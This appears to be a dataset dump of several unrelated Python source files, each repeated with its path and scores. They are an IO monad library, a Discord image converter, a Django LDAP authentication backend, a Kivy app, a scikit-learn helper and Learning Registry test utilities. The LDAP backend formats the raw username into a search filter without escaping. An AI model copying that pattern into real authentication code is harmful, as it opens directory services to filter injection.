def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
assert self._value is not None
s, io = self._value
a = io.__str__(m + 1, n)
return '%sPut ("%s",\n%s\n%s)' % (ind(m), s, a, ind(m))
class Get(IO):
"""A container holding a function from string -> IO, which can
be applied to whatever string is read from stdin.
"""
def __init__(self, func: Callable[[str], IO]) -> None:
super().__init__(func)
def bind(self, func: Callable[[Any], IO]) -> IO:
"""IO a -> (a -> IO b) -> IO b"""
assert self._value is not None
g = self._value
return Get(lambda text: g(text).bind(func))
def map(self, func: Callable[[Any], Any]) -> "Get":
# Get (\s -> fmap f (g s))
assert self._value is not None
g = self._value
return Get(lambda s: g(s).map(func))
def run(self, world: int) -> IO:
"""Run IO Action"""
assert self._value is not None
func = self._value
new_world, text = pure_input(world)
action = func(text)
return action(world=new_world)
def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
assert self._value is not None
g = self._value
i = "x%s" % n
a = g(i).__str__(m + 1, n + 1)
return "%sGet (%s => \n%s\n%s)" % (ind(m), i, a, ind(m))
class ReadFile(IO):
"""A container holding a filename and a function from string -> IO,
which can be applied to whatever string is read from the file.
"""
def __init__(self, filename: str, func: Callable[[str], IO]) -> None:
super().__init__((filename, func))
self.open_func = open
self._get_value = lambda: (filename, func)
def bind(self, func: Callable[[Any], IO]) -> IO:
"""IO a -> (a -> IO b) -> IO b"""
filename, g = self._get_value()
return ReadFile(filename, lambda s: g(s).bind(func))
def map(self, func: Callable[[Any], Any]) -> IO:
# Get (\s -> fmap f (g s))
filename, g = self._get_value()
return Get(lambda s: g(s).map(func))
def run(self, world: int) -> IO:
"""Run IO Action"""
filename, func = self._get_value()
f = self.open_func(filename)
action = func(f.read())
return action(world=world + 1)
def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
filename, g = self._get_value()
i = "x%s" % n
a = g(i).__str__(m + 2, n + 1)
return '%sReadFile ("%s",%s => \n%s\n%s)' % (ind(m), filename, i, a, ind(m))
def get_line() -> IO:
return Get(lambda text: IO(text))
def put_line(string: str) -> IO:
return Put(string, IO(None))
def read_file(filename: str) -> IO:
return ReadFile(filename, lambda text: IO(text))
def pure_print(world: int, text: str) -> int:
print(text) # Impure. NOTE: If you see this line you need to wash your hands
return world + 1
def pure_input(world: int) -> Tuple[int, str]:
text = input() # Impure. NOTE: If you see this line you need to wash your hands
return (world + 1, text)
assert isinstance(IO, Functor)
assert isinstance(IO, Applicative)
assert isinstance(IO, Monad)
assert isinstance(Put, Functor)
assert isinstance(Put, Applicative)
assert isinstance(Put, Monad)
assert isinstance(Get, Functor)
assert isinstance(Get, Applicative)
assert isinstance(Get, Monad)
assert isinstance(ReadFile, Functor)
assert isinstance(ReadFile, Applicative)
assert isinstance(ReadFile, Monad) | oslash/ioaction.py | from typing import Any, Callable, Generic, TypeVar, Tuple, Optional
from .typing import Applicative
from .typing import Functor
from .typing import Monad
from .util import indent as ind
TSource = TypeVar("TSource")
TResult = TypeVar("TResult")
class IO(Generic[TSource]):
"""A container for a world remaking function.
IO Actions specify something that can be done. They are not active
in and of themselves. They need to be "run" to make something
happen. Simply having an action lying around doesn't make anything
happen.
"""
def __init__(self, value: Optional[TSource] = None) -> None:
"""Create IO Action."""
super().__init__()
self._value = value
@classmethod
def unit(cls, value: TSource):
return cls(value)
def bind(self, func: Callable[[Optional[TSource]], "IO[Optional[TResult]]"]) -> "IO[Optional[TResult]]":
"""IO a -> (a -> IO b) -> IO b."""
return func(self._value)
@classmethod
def pure(
cls, value: Optional[Callable[[Optional[TSource]], Optional[TResult]]]
) -> "IO[Optional[Callable[[Optional[TSource]], Optional[TResult]]]]":
return IO(value)
def apply(
self: "IO[Optional[Callable[[Optional[TSource]], Optional[TResult]]]]", something: "IO[Optional[TSource]]"
) -> "IO[Optional[TResult]]":
"""Apply wrapped function over something."""
assert self._value is not None
return something.map(self._value)
def map(self, func: Callable[[Optional[TSource]], Optional[TResult]]) -> "IO[Optional[TResult]]":
return IO(func(self._value))
def run(self, world: int) -> Optional[TSource]:
"""Run IO action."""
return self._value
def __or__(self, func):
"""Use | as operator for bind.
Provide the | operator instead of the Haskell >>= operator
"""
return self.bind(func)
def __call__(self, world: int = 0) -> Any:
"""Nothing more to run."""
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
a = self._value
return "%sReturn %s" % (ind(m), [a])
def __repr__(self) -> str:
return self.__str__()
class Put(IO):
"""The Put action.
A container holding a string to be printed to stdout, followed by
another IO Action.
"""
def __init__(self, text: str, action: IO) -> None:
super().__init__((text, action))
def bind(self, func: Callable[[Optional[TSource]], IO[Optional[TResult]]]) -> "Put":
"""IO a -> (a -> IO b) -> IO b"""
assert self._value is not None
text, a = self._value
return Put(text, a.bind(func))
def map(self, func: Callable[[Optional[TSource]], Optional[TResult]]) -> "Put":
# Put s (fmap f io)
assert self._value is not None
text, action = self._value
return Put(text, action.map(func))
def run(self, world: int) -> IO:
"""Run IO action"""
assert self._value is not None
text, action = self._value
new_world = pure_print(world, text)
return action(world=new_world)
def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
assert self._value is not None
s, io = self._value
a = io.__str__(m + 1, n)
return '%sPut ("%s",\n%s\n%s)' % (ind(m), s, a, ind(m))
class Get(IO):
"""A container holding a function from string -> IO, which can
be applied to whatever string is read from stdin.
"""
def __init__(self, func: Callable[[str], IO]) -> None:
super().__init__(func)
def bind(self, func: Callable[[Any], IO]) -> IO:
"""IO a -> (a -> IO b) -> IO b"""
assert self._value is not None
g = self._value
return Get(lambda text: g(text).bind(func))
def map(self, func: Callable[[Any], Any]) -> "Get":
# Get (\s -> fmap f (g s))
assert self._value is not None
g = self._value
return Get(lambda s: g(s).map(func))
def run(self, world: int) -> IO:
"""Run IO Action"""
assert self._value is not None
func = self._value
new_world, text = pure_input(world)
action = func(text)
return action(world=new_world)
def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
assert self._value is not None
g = self._value
i = "x%s" % n
a = g(i).__str__(m + 1, n + 1)
return "%sGet (%s => \n%s\n%s)" % (ind(m), i, a, ind(m))
class ReadFile(IO):
"""A container holding a filename and a function from string -> IO,
which can be applied to whatever string is read from the file.
"""
def __init__(self, filename: str, func: Callable[[str], IO]) -> None:
super().__init__((filename, func))
self.open_func = open
self._get_value = lambda: (filename, func)
def bind(self, func: Callable[[Any], IO]) -> IO:
"""IO a -> (a -> IO b) -> IO b"""
filename, g = self._get_value()
return ReadFile(filename, lambda s: g(s).bind(func))
def map(self, func: Callable[[Any], Any]) -> IO:
# Get (\s -> fmap f (g s))
filename, g = self._get_value()
return Get(lambda s: g(s).map(func))
def run(self, world: int) -> IO:
"""Run IO Action"""
filename, func = self._get_value()
f = self.open_func(filename)
action = func(f.read())
return action(world=world + 1)
def __call__(self, world: int = 0) -> IO:
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
filename, g = self._get_value()
i = "x%s" % n
a = g(i).__str__(m + 2, n + 1)
return '%sReadFile ("%s",%s => \n%s\n%s)' % (ind(m), filename, i, a, ind(m))
def get_line() -> IO:
return Get(lambda text: IO(text))
def put_line(string: str) -> IO:
return Put(string, IO(None))
def read_file(filename: str) -> IO:
return ReadFile(filename, lambda text: IO(text))
def pure_print(world: int, text: str) -> int:
print(text) # Impure. NOTE: If you see this line you need to wash your hands
return world + 1
def pure_input(world: int) -> Tuple[int, str]:
text = input() # Impure. NOTE: If you see this line you need to wash your hands
return (world + 1, text)
assert isinstance(IO, Functor)
assert isinstance(IO, Applicative)
assert isinstance(IO, Monad)
assert isinstance(Put, Functor)
assert isinstance(Put, Applicative)
assert isinstance(Put, Monad)
assert isinstance(Get, Functor)
assert isinstance(Get, Applicative)
assert isinstance(Get, Monad)
assert isinstance(ReadFile, Functor)
assert isinstance(ReadFile, Applicative)
assert isinstance(ReadFile, Monad) | 0.895705 | 0.428473 |
import re
from discord.ext.commands.converter import Converter
from discord.ext.commands.errors import BadArgument
IMAGE_LINKS = re.compile(r"(https?:\/\/[^\"\'\s]*\.(?:png|jpg|jpeg|gif|png|svg)(\?size=[0-9]*)?)")
MENTION_REGEX = re.compile(r"<@!?([0-9]+)>")
ID_REGEX = re.compile(r"[0-9]{17,}")
class ImageFinder(Converter):
"""This is a class to convert notsobots image searching capabilities into a more general
converter class."""
async def convert(self, ctx, argument):
attachments = ctx.message.attachments
mentions = MENTION_REGEX.finditer(argument)
matches = IMAGE_LINKS.finditer(argument)
ids = ID_REGEX.finditer(argument)
urls = []
if matches:
for match in matches:
urls.append(match.group(1))
if mentions:
for mention in mentions:
user = ctx.guild.get_member(int(mention.group(1)))
if user is not None:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if not urls and ids:
for possible_id in ids:
user = ctx.guild.get_member(int(possible_id.group(0)))
if user:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if attachments:
for attachment in attachments:
urls.append(attachment.url)
if not urls and ctx.guild:
user = ctx.guild.get_member_named(argument)
if not user:
raise BadArgument("No images provided.")
if user.is_avatar_animated():
url = user.avatar_url_as(format="gif")
else:
url = user.avatar_url_as(format="png")
urls.append(url)
if not urls:
raise BadArgument("No images provided.")
return urls[0] | dankmemer/converters.py |
import re
from discord.ext.commands.converter import Converter
from discord.ext.commands.errors import BadArgument
IMAGE_LINKS = re.compile(r"(https?:\/\/[^\"\'\s]*\.(?:png|jpg|jpeg|gif|png|svg)(\?size=[0-9]*)?)")
MENTION_REGEX = re.compile(r"<@!?([0-9]+)>")
ID_REGEX = re.compile(r"[0-9]{17,}")
class ImageFinder(Converter):
"""This is a class to convert notsobots image searching capabilities into a more general
converter class."""
async def convert(self, ctx, argument):
attachments = ctx.message.attachments
mentions = MENTION_REGEX.finditer(argument)
matches = IMAGE_LINKS.finditer(argument)
ids = ID_REGEX.finditer(argument)
urls = []
if matches:
for match in matches:
urls.append(match.group(1))
if mentions:
for mention in mentions:
user = ctx.guild.get_member(int(mention.group(1)))
if user is not None:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if not urls and ids:
for possible_id in ids:
user = ctx.guild.get_member(int(possible_id.group(0)))
if user:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if attachments:
for attachment in attachments:
urls.append(attachment.url)
if not urls and ctx.guild:
user = ctx.guild.get_member_named(argument)
if not user:
raise BadArgument("No images provided.")
if user.is_avatar_animated():
url = user.avatar_url_as(format="gif")
else:
url = user.avatar_url_as(format="png")
urls.append(url)
if not urls:
raise BadArgument("No images provided.")
return urls[0] | 0.422147 | 0.189859 |
import ldap
from django.conf import settings
from django.contrib.auth.models import User
#stripped down version of http://djangosnippets.org/snippets/901/
class ActiveDirectoryGroupMembershipSSLBackend:
#----------------------------------------------------------------------
def authenticate(self,username=None,password=<PASSWORD>):
try:
if len(password) == 0:
return None
#ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,settings.AD_CERT_FILE)
l = ldap.initialize(settings.AD_LDAP_URL)
l.set_option(ldap.OPT_PROTOCOL_VERSION, 3)
binddn = "%s@%s" % (username,settings.AD_NT4_DOMAIN)
l.simple_bind_s(binddn,password)
l.unbind_s()
return self.get_or_create_user(username,password)
except ImportError:
pass
except ldap.INVALID_CREDENTIALS:
pass
#----------------------------------------------------------------------
def get_or_create_user(self, username, password):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
try:
#ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,settings.AD_CERT_FILE)
ldap.set_option(ldap.OPT_REFERRALS,0) # DO NOT TURN THIS OFF OR SEARCH WON'T WORK!
# initialize
l = ldap.initialize(settings.AD_LDAP_URL)
l.set_option(ldap.OPT_PROTOCOL_VERSION, 3)
# bind
binddn = "%s@%s" % (username,settings.AD_NT4_DOMAIN)
l.bind_s(binddn,password)
# search
result = l.search_ext_s(settings.AD_SEARCH_DN,ldap.SCOPE_SUBTREE,"sAMAccountName=%s" % username,settings.AD_SEARCH_FIELDS)[0][1]
# get personal info
mail = result.get("mail",[None])[0]
last_name = result.get("sn",[None])[0]
first_name = result.get("givenName",[None])[0]
l.unbind_s()
user = User(username=username,first_name=first_name,last_name=last_name,email=mail)
except Exception:
return None
user.is_staff = False
user.is_superuser = False
user.set_password('<PASSWORD>')
user.save()
return user
#----------------------------------------------------------------------
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None | qatrack/accounts/backends.py | import ldap
from django.conf import settings
from django.contrib.auth.models import User
#stripped down version of http://djangosnippets.org/snippets/901/
class ActiveDirectoryGroupMembershipSSLBackend:
#----------------------------------------------------------------------
def authenticate(self,username=None,password=<PASSWORD>):
try:
if len(password) == 0:
return None
#ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,settings.AD_CERT_FILE)
l = ldap.initialize(settings.AD_LDAP_URL)
l.set_option(ldap.OPT_PROTOCOL_VERSION, 3)
binddn = "%s@%s" % (username,settings.AD_NT4_DOMAIN)
l.simple_bind_s(binddn,password)
l.unbind_s()
return self.get_or_create_user(username,password)
except ImportError:
pass
except ldap.INVALID_CREDENTIALS:
pass
#----------------------------------------------------------------------
def get_or_create_user(self, username, password):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
try:
#ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,settings.AD_CERT_FILE)
ldap.set_option(ldap.OPT_REFERRALS,0) # DO NOT TURN THIS OFF OR SEARCH WON'T WORK!
# initialize
l = ldap.initialize(settings.AD_LDAP_URL)
l.set_option(ldap.OPT_PROTOCOL_VERSION, 3)
# bind
binddn = "%s@%s" % (username,settings.AD_NT4_DOMAIN)
l.bind_s(binddn,password)
# search
result = l.search_ext_s(settings.AD_SEARCH_DN,ldap.SCOPE_SUBTREE,"sAMAccountName=%s" % username,settings.AD_SEARCH_FIELDS)[0][1]
# get personal info
mail = result.get("mail",[None])[0]
last_name = result.get("sn",[None])[0]
first_name = result.get("givenName",[None])[0]
l.unbind_s()
user = User(username=username,first_name=first_name,last_name=last_name,email=mail)
except Exception:
return None
user.is_staff = False
user.is_superuser = False
user.set_password('<PASSWORD>')
user.save()
return user
#----------------------------------------------------------------------
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None | 0.144059 | 0.071074 |
import os
import sys
from kivy.app import App
from kivy.lang import Builder
from kivy.core.window import Window
from kivy.config import ConfigParser
from kivy.properties import ObjectProperty
from kivy.utils import get_hex_from_color
from libs.uix import customsettings
from libs.uix.dialogs import dialog
from libs.uix.kv.activity.baseclass.startscreen import StartScreen
from libs import programdata as data
from libs import programclass as _class
from kivymd.theming import ThemeManager
from kivymd.navigationdrawer import NavigationDrawer
class NavDrawer(NavigationDrawer):
events_callback = ObjectProperty()
class Program(App, _class.ShowPlugin, _class.ShowAbout, _class.ShowLicense):
'''Функционал программы.'''
settings_cls = customsettings.CustomSettings
customsettings.TEXT_INPUT = data.string_lang_enter_value
nav_drawer = ObjectProperty()
theme_cls = ThemeManager()
theme_cls.primary_palette = 'Teal'
def __init__(self, **kvargs):
super(Program, self).__init__(**kvargs)
Window.bind(on_keyboard=self.events_program)
self.data = data
self.open_exit_dialog = None
self.load_all_kv_files('{}/libs/uix/kv'.format(self.directory))
self.load_all_kv_files(
'{}/libs/uix/kv/activity'.format(self.directory)
)
def build_config(self, config):
config.adddefaultsection('General')
config.setdefault('General', 'language', 'Русский')
config.setdefault('General', 'theme', 'default')
def build_settings(self, settings):
with open('{}/data/settings/general.json'.format(
data.prog_path), 'r') as settings_json:
settings.add_json_panel(data.string_lang_settings, self.config,
data=settings_json.read().format(
language=data.string_lang_setting_language,
title=data.string_lang_setting_language_title,
desc=data.string_lang_setting_language_desc,
russian=data.string_lang_setting_language_russian,
english=data.string_lang_setting_language_english))
def build(self):
self.use_kivy_settings = False
self.title = data.string_lang_title # заголовок окна программы
self.icon = 'data/images/logo.png' # иконка окна программы
self.config = ConfigParser()
self.config.read('{}/program.ini'.format(data.prog_path))
# Главный экран программы.
self.screen = StartScreen(events_callback=self.events_program)
self.nav_drawer = NavDrawer(title=data.string_lang_menu)
return self.screen
def events_program(self, *args):
'''Вызывается при выборе одного из пунктов меню программы.'''
if len(args) == 2: # нажата ссылка
event = args[1]
else: # нажата кнопка программы
try:
_args = args[0]
event = _args if isinstance(_args, str) else _args.id
except AttributeError: # нажата кнопка девайса
event = args[1]
if data.PY2:
if isinstance(event, unicode):
event = event.encode('utf-8')
if event == data.string_lang_settings:
self.open_settings()
elif event == data.string_lang_exit_key:
self.exit_program()
elif event == data.string_lang_license:
self.show_license()
elif event == data.string_lang_plugin:
self.show_plugins()
elif event in (1001, 27):
self.back_screen(event)
elif event == 'About':
self.show_about()
return True
def back_screen(self, event):
'''Менеджер экранов.'''
# Нажата BackKey на главном экране.
if self.screen.ids.screen_manager.current == '':
if event in (1001, 27):
self.exit_program()
return
if len(self.screen.ids.screen_manager.screens) != 1:
self.screen.ids.screen_manager.screens.pop()
self.screen.ids.screen_manager.current = \
self.screen.ids.screen_manager.screen_names[-1]
self.set_current_item_tabbed_panel(
data.theme_text_color, get_hex_from_color(
data.color_action_bar
)
)
def exit_program(self, *args):
def close_dialog():
self.open_exit_dialog.dismiss()
self.open_exit_dialog = None
if self.open_exit_dialog:
return
self.open_exit_dialog = dialog(
text=data.string_lang_exit, title=self.title, dismiss=False,
buttons=[
[data.string_lang_yes, lambda *x: sys.exit(0)],
[data.string_lang_no, lambda *x: close_dialog()]
]
)
def load_all_kv_files(self, directory_kv_files):
for kv_file in os.listdir(directory_kv_files):
if kv_file in ('bugreporter.kv', '__init__.py') or \
os.path.isdir('{}/{}'.format(directory_kv_files, kv_file)):
continue
Builder.load_file('{}/{}'.format(directory_kv_files, kv_file))
def on_config_change(self, config, section, key, value):
'''Вызывается при выборе одного из пункта настроек программы.'''
if key == 'language':
if not os.path.exists('{}/data/language/{}.txt'.format(
self.directory, data.select_locale[value])):
dialog(
text=data.string_lang_not_locale.format(
data.select_locale[value]
),
title=self.title
)
config.set(section, key, data.old_language)
config.write()
self.close_settings()
def on_pause(self):
'''Ставит приложение на 'паузу' при выхоже из него.
В противном случае запускает программу заново'''
return True | program.py |
import os
import sys
from kivy.app import App
from kivy.lang import Builder
from kivy.core.window import Window
from kivy.config import ConfigParser
from kivy.properties import ObjectProperty
from kivy.utils import get_hex_from_color
from libs.uix import customsettings
from libs.uix.dialogs import dialog
from libs.uix.kv.activity.baseclass.startscreen import StartScreen
from libs import programdata as data
from libs import programclass as _class
from kivymd.theming import ThemeManager
from kivymd.navigationdrawer import NavigationDrawer
class NavDrawer(NavigationDrawer):
events_callback = ObjectProperty()
class Program(App, _class.ShowPlugin, _class.ShowAbout, _class.ShowLicense):
'''Функционал программы.'''
settings_cls = customsettings.CustomSettings
customsettings.TEXT_INPUT = data.string_lang_enter_value
nav_drawer = ObjectProperty()
theme_cls = ThemeManager()
theme_cls.primary_palette = 'Teal'
def __init__(self, **kvargs):
super(Program, self).__init__(**kvargs)
Window.bind(on_keyboard=self.events_program)
self.data = data
self.open_exit_dialog = None
self.load_all_kv_files('{}/libs/uix/kv'.format(self.directory))
self.load_all_kv_files(
'{}/libs/uix/kv/activity'.format(self.directory)
)
def build_config(self, config):
config.adddefaultsection('General')
config.setdefault('General', 'language', 'Русский')
config.setdefault('General', 'theme', 'default')
def build_settings(self, settings):
with open('{}/data/settings/general.json'.format(
data.prog_path), 'r') as settings_json:
settings.add_json_panel(data.string_lang_settings, self.config,
data=settings_json.read().format(
language=data.string_lang_setting_language,
title=data.string_lang_setting_language_title,
desc=data.string_lang_setting_language_desc,
russian=data.string_lang_setting_language_russian,
english=data.string_lang_setting_language_english))
def build(self):
self.use_kivy_settings = False
self.title = data.string_lang_title # заголовок окна программы
self.icon = 'data/images/logo.png' # иконка окна программы
self.config = ConfigParser()
self.config.read('{}/program.ini'.format(data.prog_path))
# Главный экран программы.
self.screen = StartScreen(events_callback=self.events_program)
self.nav_drawer = NavDrawer(title=data.string_lang_menu)
return self.screen
def events_program(self, *args):
'''Вызывается при выборе одного из пунктов меню программы.'''
if len(args) == 2: # нажата ссылка
event = args[1]
else: # нажата кнопка программы
try:
_args = args[0]
event = _args if isinstance(_args, str) else _args.id
except AttributeError: # нажата кнопка девайса
event = args[1]
if data.PY2:
if isinstance(event, unicode):
event = event.encode('utf-8')
if event == data.string_lang_settings:
self.open_settings()
elif event == data.string_lang_exit_key:
self.exit_program()
elif event == data.string_lang_license:
self.show_license()
elif event == data.string_lang_plugin:
self.show_plugins()
elif event in (1001, 27):
self.back_screen(event)
elif event == 'About':
self.show_about()
return True
def back_screen(self, event):
'''Менеджер экранов.'''
# Нажата BackKey на главном экране.
if self.screen.ids.screen_manager.current == '':
if event in (1001, 27):
self.exit_program()
return
if len(self.screen.ids.screen_manager.screens) != 1:
self.screen.ids.screen_manager.screens.pop()
self.screen.ids.screen_manager.current = \
self.screen.ids.screen_manager.screen_names[-1]
self.set_current_item_tabbed_panel(
data.theme_text_color, get_hex_from_color(
data.color_action_bar
)
)
def exit_program(self, *args):
def close_dialog():
self.open_exit_dialog.dismiss()
self.open_exit_dialog = None
if self.open_exit_dialog:
return
self.open_exit_dialog = dialog(
text=data.string_lang_exit, title=self.title, dismiss=False,
buttons=[
[data.string_lang_yes, lambda *x: sys.exit(0)],
[data.string_lang_no, lambda *x: close_dialog()]
]
)
def load_all_kv_files(self, directory_kv_files):
for kv_file in os.listdir(directory_kv_files):
if kv_file in ('bugreporter.kv', '__init__.py') or \
os.path.isdir('{}/{}'.format(directory_kv_files, kv_file)):
continue
Builder.load_file('{}/{}'.format(directory_kv_files, kv_file))
def on_config_change(self, config, section, key, value):
'''Вызывается при выборе одного из пункта настроек программы.'''
if key == 'language':
if not os.path.exists('{}/data/language/{}.txt'.format(
self.directory, data.select_locale[value])):
dialog(
text=data.string_lang_not_locale.format(
data.select_locale[value]
),
title=self.title
)
config.set(section, key, data.old_language)
config.write()
self.close_settings()
def on_pause(self):
'''Ставит приложение на 'паузу' при выхоже из него.
В противном случае запускает программу заново'''
return True | 0.243642 | 0.062103 |
from sklearn.metrics import recall_score, precision_score, roc_auc_score, accuracy_score
from sklearn.model_selection import train_test_split
import pickle
class Modeler:
"""
Modeler makes repetitive classification tasks simpler in Scikit-Learn.
Out of the box, it gives you common metrics such as recall, precision, accuracy, and AUC ROC.
Example:
--------------------------
Let's say you want to run a classification experiment. Here's how you do it:
>>> from easyml.modeler import Model
>>> modeler = Modeler(df, features, label, model, verbose=True)
>>> modeler.fit()
Getting metrics for train:
-----------------------------------------
recall_score: 1.0
precision_score: 1.0
roc_auc_score: 1.0
accuracy_score: 1.0
Getting metrics for test:
-----------------------------------------
recall_score: 0.9166666666666666
precision_score: 0.9166666666666666
roc_auc_score: 0.8869047619047619
accuracy_score: 0.8947368421052632
Getting metrics for full:
-----------------------------------------
recall_score: 0.9831932773109243
precision_score: 0.9831932773109243
roc_auc_score: 0.9774456952592357
accuracy_score: 0.9789103690685413
"""
def __init__(self, df, features, label, model, verbose=False):
'''
df = Pandas dataframe
features = Feature names array
label = label column in dataframe
model = initialized model for training
'''
self._df = df
self._features = features
self._label = label
self._model = model
self._metrics = {}
self._verbose = verbose
def fit(self):
X, y = self._df[self._features], self._df[self._label]
X_tr, X_ts, Y_tr, Y_ts = train_test_split(X, y, test_size=0.2)
self._model.fit(X_tr, Y_tr)
y_pred_train = self._model.predict(X_tr)
y_pred_test = self._model.predict(X_ts)
y_full = self._model.predict(X)
self._set_metrics(Y_tr, y_pred_train, 'train')
self._set_metrics(Y_ts, y_pred_test, 'test')
self._set_metrics(y, y_full, 'full')
def _set_metrics(self, y_true, y_pred, data_type):
'''
Data type can be train, test, or full
'''
if self._verbose:
print('Getting metrics for {}:'.format(data_type))
print('-----------------------------------------')
self._metrics[data_type] = {}
funcs = [recall_score, precision_score, roc_auc_score, accuracy_score]
for func in funcs:
metric_name = func.__name__
metric_score = func(y_true, y_pred)
if self._verbose:
print('{}: {}'.format(metric_name, metric_score))
self._metrics[data_type][metric_name] = metric_score
if self._verbose:
print()
def to_pickle(self, filename):
if self._verbose:
print('Saving to {}'.format(filename))
with open(filename, 'wb') as f:
pickle.dump(self, f)
def get_model(self):
return self._model
def get_metrics(self):
return self._metrics
def get_features(self):
return self._features | easyml/modeler.py | from sklearn.metrics import recall_score, precision_score, roc_auc_score, accuracy_score
from sklearn.model_selection import train_test_split
import pickle
class Modeler:
"""
Modeler makes repetitive classification tasks simpler in Scikit-Learn.
Out of the box, it gives you common metrics such as recall, precision, accuracy, and AUC ROC.
Example:
--------------------------
Let's say you want to run a classification experiment. Here's how you do it:
>>> from easyml.modeler import Model
>>> modeler = Modeler(df, features, label, model, verbose=True)
>>> modeler.fit()
Getting metrics for train:
-----------------------------------------
recall_score: 1.0
precision_score: 1.0
roc_auc_score: 1.0
accuracy_score: 1.0
Getting metrics for test:
-----------------------------------------
recall_score: 0.9166666666666666
precision_score: 0.9166666666666666
roc_auc_score: 0.8869047619047619
accuracy_score: 0.8947368421052632
Getting metrics for full:
-----------------------------------------
recall_score: 0.9831932773109243
precision_score: 0.9831932773109243
roc_auc_score: 0.9774456952592357
accuracy_score: 0.9789103690685413
"""
def __init__(self, df, features, label, model, verbose=False):
'''
df = Pandas dataframe
features = Feature names array
label = label column in dataframe
model = initialized model for training
'''
self._df = df
self._features = features
self._label = label
self._model = model
self._metrics = {}
self._verbose = verbose
def fit(self):
X, y = self._df[self._features], self._df[self._label]
X_tr, X_ts, Y_tr, Y_ts = train_test_split(X, y, test_size=0.2)
self._model.fit(X_tr, Y_tr)
y_pred_train = self._model.predict(X_tr)
y_pred_test = self._model.predict(X_ts)
y_full = self._model.predict(X)
self._set_metrics(Y_tr, y_pred_train, 'train')
self._set_metrics(Y_ts, y_pred_test, 'test')
self._set_metrics(y, y_full, 'full')
def _set_metrics(self, y_true, y_pred, data_type):
'''
Data type can be train, test, or full
'''
if self._verbose:
print('Getting metrics for {}:'.format(data_type))
print('-----------------------------------------')
self._metrics[data_type] = {}
funcs = [recall_score, precision_score, roc_auc_score, accuracy_score]
for func in funcs:
metric_name = func.__name__
metric_score = func(y_true, y_pred)
if self._verbose:
print('{}: {}'.format(metric_name, metric_score))
self._metrics[data_type][metric_name] = metric_score
if self._verbose:
print()
def to_pickle(self, filename):
if self._verbose:
print('Saving to {}'.format(filename))
with open(filename, 'wb') as f:
pickle.dump(self, f)
def get_model(self):
return self._model
def get_metrics(self):
return self._metrics
def get_features(self):
return self._features | 0.894617 | 0.503113 |
from contextlib import closing
from functools import wraps
from ijson.parse import items
from lr.lib.signing import reloadGPGConfig
from pylons import config
from uuid import uuid1
from LRSignature.sign.Sign import Sign_0_21
import base64
import copy
import couchdb
import gnupg
import ijson
import json
import logging
import os
import shutil
import tempfile
import time
import urllib, urlparse, oauth2, socket, uuid
import urllib2
log = logging.getLogger(__name__)
class SetFlowControl(object):
def __init__(self,enabled,serviceDoc,doc_limit=100,id_limit=100):
server = couchdb.Server(config['couchdb.url.dbadmin'])
self.nodeDb = server[config['couchdb.db.node']]
self.enabled = enabled
self.serviceDoc = serviceDoc
self.doc_limit=doc_limit
self.id_limit=id_limit
def __call__(self,f):
@wraps(f)
def set_flow_control(obj, *args, **kw):
serviceDoc = self.nodeDb[self.serviceDoc]
service_data = copy.deepcopy(serviceDoc['service_data'])
serviceDoc['service_data']['flow_control'] = self.enabled
serviceDoc['service_data']['doc_limit'] = self.doc_limit
serviceDoc['service_data']['id_limit'] = self.id_limit
self.nodeDb[self.serviceDoc] = serviceDoc
try:
return f(obj, *args, **kw)
finally:
serviceDoc['service_data'] = service_data
self.nodeDb[self.serviceDoc] = serviceDoc
return set_flow_control
class ModifiedServiceDoc(object):
def __init__(self, service_doc_id, update=None):
server = couchdb.Server(config['couchdb.url.dbadmin'])
self.nodeDb = server[config['couchdb.db.node']]
self.service_doc_id = service_doc_id
self.update_fn = update
def __call__(self,f):
@wraps(f)
def wrapped(*args, **kw):
orig_serviceDoc = self.nodeDb[self.service_doc_id]
copy_serviceDoc = copy.deepcopy(orig_serviceDoc)
if self.update_fn:
copy_serviceDoc =self.update_fn(copy_serviceDoc)
self.nodeDb[self.service_doc_id] = copy_serviceDoc
try:
return f(*args, **kw)
finally:
orig_serviceDoc["_rev"] = self.nodeDb[self.service_doc_id]["_rev"]
self.nodeDb[self.service_doc_id] = orig_serviceDoc
return wrapped
def update_authz(basicauth=False, oauth=False):
def update(orig):
orig["service_auth"] = orig["service_auth"] or { }
orig["service_auth"]["service_authz"] = []
if basicauth == True:
orig["service_auth"]["service_authz"].append("basicauth")
if oauth == True:
orig["service_auth"]["service_authz"].append("oauth")
if len(orig["service_auth"]["service_authz"]) == 0:
orig["service_auth"]["service_authz"].append("none")
return orig
return update
def ForceCouchDBIndexing():
json_headers = {"Content-Type": "application/json"}
couch = {
"url": config["couchdb.url"],
"resource_data": config["couchdb.db.resourcedata"]
}
def indexTestData(obj):
opts = {
"startkey":"_design/",
"endkey": "_design0",
"include_docs": True
}
